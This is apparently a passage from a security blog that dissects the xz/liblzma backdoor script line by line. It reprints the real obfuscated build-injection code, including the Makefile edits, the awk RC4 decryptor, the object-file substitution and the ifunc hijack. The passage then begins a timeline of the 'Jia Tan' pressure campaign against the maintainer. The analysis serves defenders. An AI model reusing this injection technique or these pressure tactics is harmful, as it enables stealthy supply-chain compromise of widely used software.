"$srcdir/tests/files/$U" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Require the backdoor-containing test files. Of course, if these files didn’t exist, it’s unclear how we obtained this script in the first place, but better safe than sorry, I suppose. <pre>if test -f "$srcdir/debian/rules" || test "x$RPM_ARCH" = "xx86_64";then eval $zrKcst </pre> <p> Add a bunch of checks when the file <code>debian/rules</code> exists or <code>$RPM_ARCH</code> is set to <code>x86_64</code>. Note that we are now inside two <code>if</code> statements: the <code>config.status</code> check above, and this one (let’s call it “if #2”). <pre>j="^ACLOCAL_M4 = \$(top_srcdir)\/aclocal.m4" if ! grep -qs "$j" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi z="^am__uninstall_files_from_dir = {" if ! grep -qs "$z" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi w="^am__install_max =" if ! grep -qs "$w" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi E=$z if ! grep -qs "$E" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi Q="^am__vpath_adj_setup =" if ! grep -qs "$Q" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi M="^am__include = include" if ! grep -qs "$M" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi L="^all: all-recursive$" if ! grep -qs "$L" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi m="^LTLIBRARIES = \$(lib_LTLIBRARIES)" if ! grep -qs "$m" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi u="AM_V_CCLD = \$(am__v_CCLD_\$(V))" if ! grep -qs "$u" src/liblzma/Makefile &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that <code>liblzma/Makefile</code> contains all the lines that will be used as anchor points later for inserting new text into the Makefile. <pre>if ! grep -qs "$O" libtool &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> <code>$O</code> was set at the very start of the script. 
This is checking that the libtool file, presumably generated during the build process, configures the compiler for a PIC (position independent code) build. <pre>eval $zrKcTy b="am__test = $U" </pre> <p> <code>$U</code> was also set at the start of the script: <code>U="bad-3-corrupt_lzma2.xz"</code>. Real work is starting! <pre>sed -i "/$j/i$b" src/liblzma/Makefile || true </pre> <p> <code>sed -i</code> runs an in-place modification of the input file, in this case <code>liblzma/Makefile</code>. Specifically, find the <code>ACLOCAL_M4</code> line we grepped for earlier (<code>/$j/</code>) and insert the <code>am__test</code> setting from <code>$b</code> (<code>i$b</code>). <pre>d=`echo $gl_path_map | sed 's/\\\/\\\\\\\\/g'` b="am__strip_prefix = $d" sed -i "/$w/i$b" src/liblzma/Makefile || true </pre> <p> Shell quoting inside a quoted string inside a Makefile really is something special. This is escaping the backslashes in the tr command enough times that it will work to insert them into the Makefile after the <code>am__install_max</code> line (<code>$w</code>). <pre>b="am__dist_setup = \$(am__strip_prefix) | xz -d 2&gt;/dev/null | \$(SHELL)" sed -i "/$E/i$b" src/liblzma/Makefile || true b="\$(top_srcdir)/tests/files/\$(am__test)" s="am__test_dir=$b" sed -i "/$Q/i$s" src/liblzma/Makefile || true </pre> <p> More added lines. It’s worth stopping for a moment to look at what’s happened so far. The script has added these lines to <code>src/liblzma/Makefile</code>: <pre>am__test = bad-3-corrupt_lzma2.xz am__strip_prefix = tr "\\t \\-_" " \\t_\\-" am__dist_setup = $(am__strip_prefix) | xz -d 2&gt;/dev/null | $(SHELL) am__test_dir = $(top_srcdir)/tests/files/$(am__test) </pre> <p> <br> These look plausible but fall apart under closer examination: for example, <code>am__test_dir</code> is a file, not a directory. The goal here seems to be that after <code>configure</code> has run, the generated <code>Makefile</code> still looks plausibly inscrutable. And the lines have been added in scattered places throughout the <code>Makefile</code>; no one will see them all next to each other like in this display. Back to the script: <pre>h="-Wl,--sort-section=name,-X" if ! echo "$LDFLAGS" | grep -qs -e "-z,now" -e "-z -Wl,now" &gt; /dev/null 2&gt;&amp;1;then h=$h",-z,now" fi j="liblzma_la_LDFLAGS += $h" sed -i "/$L/i$j" src/liblzma/Makefile || true </pre> <p> <br> Add <code>liblzma_la_LDFLAGS += -Wl,--sort-section=name,-X</code> to the Makefile. If the <code>LDFLAGS</code> do not already say <code>-z,now</code> or <code>-Wl,now</code>, add <code>-z,now</code>. <p> The “<code>-Wl,now</code>” forces <code>LD_BIND_NOW</code> behavior, in which the dynamic loader resolves all symbols at program startup time. One reason this is normally done is for security: it makes sure that the global offset table and procedure linkage tables can be marked read-only early in process startup, so that buffer overflows or write-after-free bugs cannot target those tables. However, it also has the effect of running GNU indirect function (ifunc) resolvers at startup during that resolution process, and the backdoor arranges to be called from one of those. This early invocation of the backdoor setup lets it run while the tables are still writable, allowing the backdoor to replace the entry for <code>RSA_public_decrypt</code> with its own version. But we are getting ahead of ourselves. Back to the script: <pre>sed -i "s/$O/$C/g" libtool || true </pre> <p> We checked earlier that the libtool file said <code>pic_flag=" -fPIC -DPIC"</code>.
The sed command changes it to read <code>pic_flag=" -fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"</code>. <p> It is not clear why these additional flags are important, but in general they disable linker optimizations that could plausibly get in the way of subterfuge. <pre>k="AM_V_CCLD = @echo -n \$(LTDEPS); \$(am__v_CCLD_\$(V))" sed -i "s/$u/$k/" src/liblzma/Makefile || true l="LTDEPS='\$(lib_LTDEPS)'; \\\\\n\ export top_srcdir='\$(top_srcdir)'; \\\\\n\ export CC='\$(CC)'; \\\\\n\ export DEFS='\$(DEFS)'; \\\\\n\ export DEFAULT_INCLUDES='\$(DEFAULT_INCLUDES)'; \\\\\n\ export INCLUDES='\$(INCLUDES)'; \\\\\n\ export liblzma_la_CPPFLAGS='\$(liblzma_la_CPPFLAGS)'; \\\\\n\ export CPPFLAGS='\$(CPPFLAGS)'; \\\\\n\ export AM_CFLAGS='\$(AM_CFLAGS)'; \\\\\n\ export CFLAGS='\$(CFLAGS)'; \\\\\n\ export AM_V_CCLD='\$(am__v_CCLD_\$(V))'; \\\\\n\ export liblzma_la_LINK='\$(liblzma_la_LINK)'; \\\\\n\ export libdir='\$(libdir)'; \\\\\n\ export liblzma_la_OBJECTS='\$(liblzma_la_OBJECTS)'; \\\\\n\ export liblzma_la_LIBADD='\$(liblzma_la_LIBADD)'; \\\\\n\ sed rpath \$(am__test_dir) | \$(am__dist_setup) &gt;/dev/null 2&gt;&amp;1"; sed -i "/$m/i$l" src/liblzma/Makefile || true eval $zrKcHD </pre> <p> Shell quoting continues to be trippy, but we’ve reached the final change. This adds the line <pre>AM_V_CCLD = @echo -n $(LTDEPS); $(am__v_CCLD_$(V)) </pre> <p> to one place in the Makefile, and then adds a long script that sets up some variables, entirely as misdirection, that ends with <pre>sed rpath $(am__test_dir) | $(am__dist_setup) &gt;/dev/null 2&gt;&amp;1 </pre> <p> The <code>sed rpath</code> command is just as much an obfuscated <code>cat</code> as <code>sed "r\n"</code> was, but <code>-rpath</code> is a very common linker flag, so at first glance you might not notice it’s next to the wrong command. Recalling the <code>am__test</code> and related lines added above, this pipeline ends up being equivalent to: <pre>cat ./tests/files/bad-3-corrupt_lzma2.xz | tr "\t \-_" " \t_\-" | xz -d | /bin/sh </pre> <p> Our old friend! We know what this does, though. It runs the very script we are currently reading in this post. <a href="https://research.swtch.com/zip">How recursive!</a> <a class=anchor href="#make"><h2 id="make">Make</h2></a> <p> Instead of running during <code>configure</code> in the tarball root directory, let’s mentally re-execute the script as it would run during <code>make</code> in the <code>liblzma</code> directory. In that context, the variables at the top have been set, but all the editing we just considered was skipped over by “if #1” not finding <code>./config.status</code>. Now let’s keep executing the script. <pre>fi </pre> <p> That <code>fi</code> closes “if #2”, which checked for a Debian or RPM build. The upcoming <code>elif</code> continues “if #1”, which checked for config.status, meaning now we are executing the part of the script that matters when run during <code>make</code> in the <code>liblzma</code> directory: <pre>elif (test -f .libs/liblzma_la-crc64_fast.o) &amp;&amp; (test -f .libs/liblzma_la-crc32_fast.o); then </pre> <p> If we see the built objects for the crc code, we are running as part of <code>make</code>. Run the following code. 
<pre># Entirely new in 5.6.1 vs=`grep -broaF 'jV!.^%' $top_srcdir/tests/files/ 2&gt;/dev/null` if test "x$vs" != "x" &gt; /dev/null 2&gt;&amp;1;then f1=`echo $vs | cut -d: -f1` if test "x$f1" != "x" &gt; /dev/null 2&gt;&amp;1;then start=`expr $(echo $vs | cut -d: -f2) + 7` ve=`grep -broaF '%.R.1Z' $top_srcdir/tests/files/ 2&gt;/dev/null` if test "x$ve" != "x" &gt; /dev/null 2&gt;&amp;1;then f2=`echo $ve | cut -d: -f1` if test "x$f2" != "x" &gt; /dev/null 2&gt;&amp;1;then [ ! "x$f2" = "x$f1" ] &amp;&amp; exit 0 [ ! -f $f1 ] &amp;&amp; exit 0 end=`expr $(echo $ve | cut -d: -f2) - $start` eval `cat $f1 | tail -c +${start} | head -c +${end} | tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377" | xz -F raw --lzma2 -dc` fi fi fi fi </pre> <p> We start this section with another extension hook. This time the magic strings are <code>'jV!.^%'</code> and <code>'%.R.1Z'</code>. As before, there are no test files with these strings. This was for future extensibility. <p> On to the code shared with 5.6.0: <pre>eval $zrKcKQ if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc64_fast.c; then exit 0 fi if ! grep -qs "$R()" $top_srcdir/src/liblzma/check/crc32_fast.c; then exit 0 fi if ! grep -qs "$R" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi if ! grep -qs "$x" $top_srcdir/src/liblzma/check/crc_x86_clmul.h; then exit 0 fi </pre> <p> Check that the ifunc-enabled CRC source files look right. Interestingly, Lasse Collin renamed <code>crc_clmul.c</code> to <code>crc_x86_clmul.h</code> <a href="https://git.tukaani.org/?p=xz.git;a=commit;h=419f55f9dfc2df8792902b8953d50690121afeea">on 2024-01-11</a>. One has to assume that the person or team behind “Jia Tan” had been working on all this code well before then and that the first version checked <code>crc_clmul.c</code>. They were probably very annoyed when Lasse Collin accidentally broke their in-development backdoor by cleaning up the file names! <pre>if ! grep -qs "$C" ../../libtool; then exit 0 fi if ! echo $liblzma_la_LINK | grep -qs -e "-z,now" -e "-z -Wl,now" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that the build configuration has the extra flags we added before. <pre>if echo $liblzma_la_LINK | grep -qs -e "lazy" &gt; /dev/null 2&gt;&amp;1;then exit 0 fi </pre> <p> Check that no one has added <code>lazy</code> to the linker options, which might override the <code>-Wl,now</code>. (This code really needs to run before the tables it patches get marked read-only!) <pre>N=0 W=0 Y=`grep "dnl Convert it to C string syntax." $top_srcdir/m4/gettext.m4` eval $zrKcjv if test -z "$Y"; then N=0 W=88664 else N=88664 W=0 fi </pre> <p> This is selecting between two different offset values depending on the content of <code>gettext.m4</code>. The distributed xz tarballs do not contain that string in <code>gettext.m4</code> (it does appear in <code>build-to-host.m4</code>), so the <code>grep</code> finds nothing, <code>$Y</code> is the empty string, and the true case of the <code>if</code> executes: <code>N=0</code> and <code>W=88792</code>. <pre>xz -dc $top_srcdir/tests/files/$p | eval $i | LC_ALL=C sed "s/\(.\)/\1\n/g" | </pre> <p> I inserted a line break here. Remember the “corrupt” test file script set <code>i</code> to the large head pipeline? It’s still set here, being used inside the script extracted from that pipeline. Before, the pipeline extracted 33,707 bytes and then we used only the last 2,475 of them (the bytes starting at offset 31,233). Now we are using the entire thing, which probably means just the prefix that we skipped before.
The sed command is inserting a newline after every byte of that output, setting up for piping into the remainder of the command line: <pre>LC_ALL=C awk ' BEGIN{ FS="\n";RS="\n";ORS="";m=256; for(i=0;i&lt;m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;} i=0;j=0;for(l=0;l&lt;8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;} } { v=t["x" (NF&lt;1?RS:$1)]; i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m]; printf "%c",(v+k)%m }' | </pre> <p> I inserted another line break here. What is this? <a href="https://twitter.com/nugxperience/status/1773906926503591970">@nugxperience on Twitter recognized it</a> as an RC4-like decryption function, implemented in awk! Apparently the <code>tr</code>-based substitution cipher wasn’t secure enough for this step. This is the 5.6.1 version; the 5.6.0 version is the same except that the second loop counts to 4096 instead of 8192. <p> Back to the script: <pre>xz -dc --single-stream | ((head -c +$N &gt; /dev/null 2&gt;&amp;1) &amp;&amp; head -c +$W) &gt; liblzma_la-crc64-fast.o || true </pre> <p> We finally made it to the end of this long line. The decrypted output is piped through xz to decompress it; the <code>--single-stream</code> flag says to stop at the end of the first xz EOF marker instead of looking for additional files on standard input. This avoids reading the section of the input that we extracted with the <code>tail</code> command before. Then the decompressed data is piped through a <code>head</code> pair that extracts either the full 88,792 byte input or zero bytes, depending on <code>gettext.m4</code> from before, and writes it to <code>liblzma_la-crc64-fast.o</code>. In our build, we are taking the full input. <pre>if ! test -f liblzma_la-crc64-fast.o; then exit 0 fi </pre> <p> If all that failed, stop quietly. <pre>cp .libs/liblzma_la-crc64_fast.o .libs/liblzma_la-crc64-fast.o || true </pre> <p> Wait what? Oh! Notice the two different file names <code>crc64_fast</code> versus <code>crc64-fast</code>. And neither of these is the one we just extracted. These are in <code>.libs/</code>, and the one we extracted is in the current directory. This is backing up the real file (the underscored one) into a file with a very similar name (the hyphenated one). <pre>V='#endif\n#if defined(CRC32_GENERIC) &amp;&amp; defined(CRC64_GENERIC) &amp;&amp; defined(CRC_X86_CLMUL) &amp;&amp; defined(CRC_USE_IFUNC) &amp;&amp; defined(PIC) &amp;&amp; (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL))\n extern int _get_cpuid(int, void*, void*, void*, void*, void*);\n static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19); return success &amp;&amp; (r[2] &amp; ecx_mask) == ecx_mask; }\n #else\n #define _is_arch_extension_supported is_arch_extension_supported' </pre> <p> This string <code>$V</code> begins with “<code>#endif</code>”, which is never a good sign. Let’s move on for now, but we’ll take a closer look at that text shortly. 
<pre>eval $yosA if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc64_fast.c | \ sed "/include \"crc_x86_clmul.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc64_fast.c\"" 2&gt;/dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \ $CFLAGS -r liblzma_la-crc64-fast.o -x c - $P -o .libs/liblzma_la-crc64_fast.o 2&gt;/dev/null; then </pre> <p> This <code>if</code> statement is running a pipeline of sed commands piped into <code>$CC</code> with the arguments <code>liblzma_la-crc64-fast.o</code> (adding that object as an input to the compiler) and <code>-x</code> <code>c</code> <code>-</code> (compile a C program from standard input). That is, it rebuilds an edited copy of <code>crc64_fast.c</code> (a real xz source file) and merges the extracted malicious <code>.o</code> file into the resulting object, overwriting the underscored real object file that would have been built originally for <code>crc64_fast.c</code>. The <code>sed</code> <code>1i</code> tells the compiler the file name to record in debug info, since the compiler is reading standard input—very tidy! But what are the edits? <p> The file starts out looking like: <pre>... #if defined(CRC_X86_CLMUL) # define BUILDING_CRC64_CLMUL # include "crc_x86_clmul.h" #endif ... static crc64_func_type crc64_resolve(void) { return is_arch_extension_supported() ? &amp;crc64_arch_optimized : &amp;crc64_generic; } </pre> <p> The sed commands add an <code>_</code> prefix to the name of the function in the return condition, and then add <code>$V</code> after the <code>include</code> line, producing (with reformatting of the C code): <pre># 0 "path/to/src/liblzma/check/crc64_fast.c" ... #if defined(CRC_X86_CLMUL) # define BUILDING_CRC64_CLMUL # include "crc_x86_clmul.h" #endif #if defined(CRC32_GENERIC) &amp;&amp; defined(CRC64_GENERIC) &amp;&amp; \ defined(CRC_X86_CLMUL) &amp;&amp; defined(CRC_USE_IFUNC) &amp;&amp; defined(PIC) &amp;&amp; \ (defined(BUILDING_CRC64_CLMUL) || defined(BUILDING_CRC32_CLMUL)) extern int _get_cpuid(int, void*, void*, void*, void*, void*); static inline bool _is_arch_extension_supported(void) { int success = 1; uint32_t r[4]; success = _get_cpuid(1, &amp;r[0], &amp;r[1], &amp;r[2], &amp;r[3], ((char*) __builtin_frame_address(0))-16); const uint32_t ecx_mask = (1 &lt;&lt; 1) | (1 &lt;&lt; 9) | (1 &lt;&lt; 19); return success &amp;&amp; (r[2] &amp; ecx_mask) == ecx_mask; } #else #define _is_arch_extension_supported is_arch_extension_supported #endif ... static crc64_func_type crc64_resolve(void) { return _is_arch_extension_supported() ? &amp;crc64_arch_optimized : &amp;crc64_generic; } </pre> <p> That is, the crc64_resolve function, which is the ifunc resolver that gets run early in dynamic loading, before the GOT and PLT have been marked read-only, is now calling the newly inserted <code>_is_arch_extension_supported</code>, which calls <code>_get_cpuid</code>. This still looks like plausible code, since this is pretty similar to <a href="https://git.tukaani.org/?p=xz.git;a=blob;f=src/liblzma/check/crc_x86_clmul.h;h=ae66ca9f8c710fd84cd8b0e6e52e7bbfb7df8c0f;hb=2d7d862e3ffa8cec4fd3fdffcd84e984a17aa429#l388">the real is_arch_extension_supported</a>. But <code>_get_cpuid</code> is provided by the backdoor .o, and it does a lot more before returning the cpuid information. In particular it rewrites the GOT and PLT to hijack calls to RSA_public_decrypt. 
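<p> The edit-and-recompile trick deserves a tiny sketch of its own. This is a toy example with made-up file names, not the attack’s: <code>sed</code> rewrites the source on the fly, a <code>1i</code> line directive restores the original file name for diagnostics and debug info, and the compiler reads the edited source from standard input, so the edited version never exists on disk.
<pre>cat &gt;greet.c &lt;&lt;'EOF'
#include &lt;stdio.h&gt;
static int greeting(void) { return 0; }
int main(void) { printf("%d\n", greeting()); }
EOF

sed "/return 0;/ c\static int greeting(void) { return 42; }" greet.c |
    sed "1i # 0 \"greet.c\"" |
    gcc -x c - -o greet &amp;&amp; ./greet    # prints 42
</pre>
<p> The real script does the same kind of thing but also passes <code>-r</code> and the extracted malicious object file to the compiler, so the output is a single combined relocatable object that quietly replaces the legitimate <code>liblzma_la-crc64_fast.o</code>.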
<p> But let’s get back to the shell script, which is still running from inside <code>src/liblzma/Makefile</code> and just successfully inserted the backdoor into <code>.libs/liblzma_la-crc64_fast.o</code>. We are now in the <code>if</code> compiler success case: <pre>cp .libs/liblzma_la-crc32_fast.o .libs/liblzma_la-crc32-fast.o || true eval $BPep if sed "/return is_arch_extension_supported()/ c\return _is_arch_extension_supported()" $top_srcdir/src/liblzma/check/crc32_fast.c | \ sed "/include \"crc32_arm64.h\"/a \\$V" | \ sed "1i # 0 \"$top_srcdir/src/liblzma/check/crc32_fast.c\"" 2&gt;/dev/null | \ $CC $DEFS $DEFAULT_INCLUDES $INCLUDES $liblzma_la_CPPFLAGS $CPPFLAGS $AM_CFLAGS \ $CFLAGS -r -x c - $P -o .libs/liblzma_la-crc32_fast.o; then </pre> <p> This does the same thing for <code>crc32_fast.c</code>, except it doesn’t add the backdoored object code. We don’t want two copies of that in the build. It is unclear why the script bothers to intercept both the crc32 and crc64 ifuncs; either one should have sufficed. Perhaps they wanted the dispatch code for both to look similar in a debugger. Now we’re in the doubly nested <code>if</code> compiler success case: <pre>eval $RgYB if $AM_V_CCLD$liblzma_la_LINK -rpath $libdir $liblzma_la_OBJECTS $liblzma_la_LIBADD; then </pre> <p> If we can relink the .la file, then... <pre>if test ! -f .libs/liblzma.so; then mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> <br> If the relink succeeded but didn’t write the file, assume it failed and restore the backups. <pre>rm -fr .libs/liblzma.a .libs/liblzma.la .libs/liblzma.lai .libs/liblzma.so* || true </pre> <p> No matter what, remove the libraries. (The <code>Makefile</code> link step is presumably going to happen next and recreate them.) <pre>else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the <code>else</code> for the link failing. Restore from backups. <pre>rm -f .libs/liblzma_la-crc32-fast.o || true rm -f .libs/liblzma_la-crc64-fast.o || true </pre> <p> Now we are in the inner compiler success case. Delete backups. <pre>else mv -f .libs/liblzma_la-crc32-fast.o .libs/liblzma_la-crc32_fast.o || true mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the else for the crc32 compilation failing. Restore from backups. <pre>else mv -f .libs/liblzma_la-crc64-fast.o .libs/liblzma_la-crc64_fast.o || true fi </pre> <p> This is the else for the crc64 compilation failing. Restore from backup. (This is not the cleanest shell script in the world!) <pre>rm -f liblzma_la-crc64-fast.o || true </pre> <p> Now we are at the end of the Makefile section of the script. Delete the backup. <pre>fi eval $DHLd $ </pre> <p> Close the “<code>elif</code> we’re in a Makefile”, one more extension point/debug print, and we’re done! The script has injected the object file into the objects built during <code>make</code>, leaving no trace behind. Timeline of the xz open source attack tag:research.swtch.com,2012:research.swtch.com/xz-timeline 2024-04-01T23:23:00-04:00 2024-04-03T09:25:00-04:00 A detailed timeline of the xz open source attack, from 2021 to 2024. 
<p> Over a period of over two years, an attacker using the name “Jia Tan” worked as a diligent, effective contributor to the xz compression library, eventually being granted commit access and maintainership. Using that access, they installed a very subtle, carefully hidden backdoor into liblzma, a part of xz that also happens to be a dependency of OpenSSH sshd on Debian, Ubuntu, and Fedora, and other systemd-based Linux systems that patched sshd to link libsystemd. (Note that this does not include systems like Arch Linux, Gentoo, and NixOS, which do not patch sshd.) That backdoor watches for the attacker sending hidden commands at the start of an SSH session, giving the attacker the ability to run an arbitrary command on the target system without logging in: unauthenticated, targeted remote code execution. <p> The attack was <a href="https://www.openwall.com/lists/oss-security/2024/03/29/4">publicly disclosed on March 29, 2024</a> and appears to be the first serious known supply chain attack on widely used open source software. It marks a watershed moment in open source supply chain security, for better or worse. <p> This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021. (See also my <a href="xz-script">analysis of the attack script</a>.) <p> Corrections or additions welcome on <a href="https://bsky.app/profile/swtch.com/post/3kp4my7wdom2q">Bluesky</a>, <a href="https://hachyderm.io/@rsc/112199506755478946">Mastodon</a>, or <a href="mailto:rsc@swtch.com">email</a>. <a class=anchor href="#prologue"><h2 id="prologue">Prologue</h2></a> <p> <b>2005–2008</b>: <a href="https://github.com/kobolabs/liblzma/blob/87b7682ce4b1c849504e2b3641cebaad62aaef87/doc/history.txt">Lasse Collin, with help from others</a>, designs the .xz file format using the LZMA compression algorithm, which compresses files to about 70% of what gzip did [1]. Over time this format becomes widely used for compressing tar files, Linux kernel images, and many other uses. <a class=anchor href="#jia_tan_arrives_on_scene_with_supporting_cast"><h2 id="jia_tan_arrives_on_scene_with_supporting_cast">Jia Tan arrives on scene, with supporting cast</h2></a> <p> <b>2021-10-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00512.html">first, innocuous patch</a> to the xz-devel mailing list, adding “.editorconfig” file. <p> <b>2021-11-29</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00519.html">second innocuous patch</a> to the xz-devel mailing list, fixing an apparent reproducible build problem. More patches that seem (even in retrospect) to be fine follow. <p> <b>2022-02-07</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=6468f7e41a8e9c611e4ba8d34e2175c5dacdbeb4">first commit with “jiat0218@gmail.com” as author in git metadata</a> (“liblzma: Add NULL checks to LZMA and LZMA2 properties encoders”). <p> <b>2022-04-19</b>: Jia Tan sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00553.html">yet another innocuous patch</a> to the xz-devel mailing list. <p> <b>2022-04-22</b>: “Jigar Kumar” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00557.html">first of a few emails</a> complaining about Jia Tan’s patch not landing. (“Patches spend years on this mailing list. 
There is no reason to think anything is coming soon.”) At this point, Lasse Collin has already landed four of Jia Tan’s patches, marked by “Thanks to Jia Tan” in the commit message. <p> <b>2022-05-19</b>: “Dennis Ens” sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00562.html">mail to xz-devel</a> asking if XZ for Java is maintained. <p> <b>2022-05-19</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00563.html">replies</a> apologizing for slowness and adds “Jia Tan has helped me off-list with XZ Utils and he might have a bigger role in the future at least with XZ Utils. It’s clear that my resources are too limited (thus the many emails waiting for replies) so something has to change in the long term.” <p> <b>2022-05-27</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00565.html">pressure email</a> to patch thread. “Over 1 month and no closer to being merged. Not a surprise.” <p> <b>2022-06-07</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00566.html">pressure email</a> to Java thread. “Progress will not happen until there is new maintainer. XZ for C has sparse commit log too. Dennis you are better off waiting until new maintainer happens or fork yourself. Submitting patches here has no purpose these days. The current maintainer lost interest or doesn’t care to maintain anymore. It is sad to see for a repo like this.” <p> <b>2022-06-08</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00567.html">pushes back</a>. “I haven’t lost interest but my ability to care has been fairly limited mostly due to longterm mental health issues but also due to some other things. Recently I’ve worked off-list a bit with Jia Tan on XZ Utils and perhaps he will have a bigger role in the future, we’ll see. It’s also good to keep in mind that this is an unpaid hobby project.” <p> <b>2022-06-10</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=aa75c5563a760aea3aa23d997d519e702e82726b">first commit with “Jia Tan” as author in git metadata</a> (“Tests: Created tests for hardware functions”). Note also that there was one earlier commit on 2022-02-07 that had the full name set only to jiat75. <p> <b>2022-06-14</b>: Lasse Collin merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=0354d6cce3ff98ea6f927107baf216253f6ce2bb">only commit with “jiat75@gmail.com” as author</a>. This could have been a temporary git misconfiguration on Jia Tan’s side forgetting their fake email address. <p> <b>2022-06-14</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00568.html">pressure email</a>. “With your current rate, I very doubt to see 5.4.0 release this year. The only progress since april has been small changes to test code. You ignore the many patches bit rotting away on this mailing list. Right now you choke your repo. Why wait until 5.4.0 to change maintainer? Why delay what your repo needs?” <p> <b>2022-06-21</b>: Dennis Ens sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00569.html">pressure email</a>. “I am sorry about your mental health issues, but its important to be aware of your own limits. I get that this is a hobby project for all contributors, but the community desires more. Why not pass on maintainership for XZ for C so you can give XZ for Java more attention? Or pass on XZ for Java to someone else to focus on XZ for C?
Trying to maintain both means that neither are maintained well.” <p> <b>2022-06-22</b>: Jigar Kumar sends <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00570.html">pressure email</a> to C patch thread. “Is there any progress on this? Jia I see you have recent commits. Why can’t you commit this yourself?” <p> <b>2022-06-29</b>: Lasse Collin <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00571.html">replies</a>: “As I have hinted in earlier emails, Jia Tan may have a bigger role in the project in the future. He has been helping a lot off-list and is practically a co-maintainer already. :-) I know that not much has happened in the git repository yet but things happen in small steps. In any case some change in maintainership is already in progress at least for XZ Utils.” <a class=anchor href="#jia_tan_becomes_maintainer"><h2 id="jia_tan_becomes_maintainer">Jia Tan becomes maintainer</h2></a> <p> At this point Lasse seems to have started working even more closely with Jia Tan. Brian Krebs <a href="https://infosec.exchange/@briankrebs/112197305365490518">observes</a> that many of these email addresses never appeared elsewhere on the internet, even in data breaches (nor again in xz-devel). It seems likely that they were fakes created to push Lasse to give Jia more control. It worked. Over the next few months, Jia started replying to threads on xz-devel authoritatively about the upcoming 5.4.0 release. <p> <b>2022-09-27</b>: Jia Tan gives <a href="https://www.mail-archive.com/xz-devel@tukaani.org/msg00593.html">release summary</a> for 5.4.0. (“The 5.4.0 release that will contain the multi threaded decoder is planned for December. The list of open issues related to 5..4.0 [sic] in general that I am tracking are...”) <p> <b>2022-10-28</b>: Jia Tan <a href="https://github.com/JiaT75?tab=overview&from=2022-10-01&to=2022-10-31">added to the Tukaani organization</a> on GitHub. Being an organization member does not imply any special access, but it is a necessary step before granting maintainer access. <p> <b>2022-11-30</b>: Lasse Collin <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=764955e2d4f2a5e8d6d6fec63af694f799e050e7">changes bug report email</a> from his personal address to an alias that goes to him and Jia Tan, notes in README that “the project maintainers Lasse Collin and Jia Tan can be reached via <a href="mailto:xz@tukaani.org">xz@tukaani.org</a>”. <p> <b>2022-12-30</b>: Jia Tan merges <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=8ace358d65059152d9a1f43f4770170d29d35754">a batch of commits directly into the xz repo</a> (“CMake: Update .gitignore for CMake artifacts from in source build”). At this point we know they have commit access. Interestingly, a <a href="https://git.tukaani.org/?p=xz.git;a=commitdiff;h=799ead162de63b8400733603d3abcd2e1977bdca">few commits later</a> in the same batch is the only commit with a different full name: “Jia Cheong Tan”. <p> <b>2023-01-11</b>: Lasse Collin <a 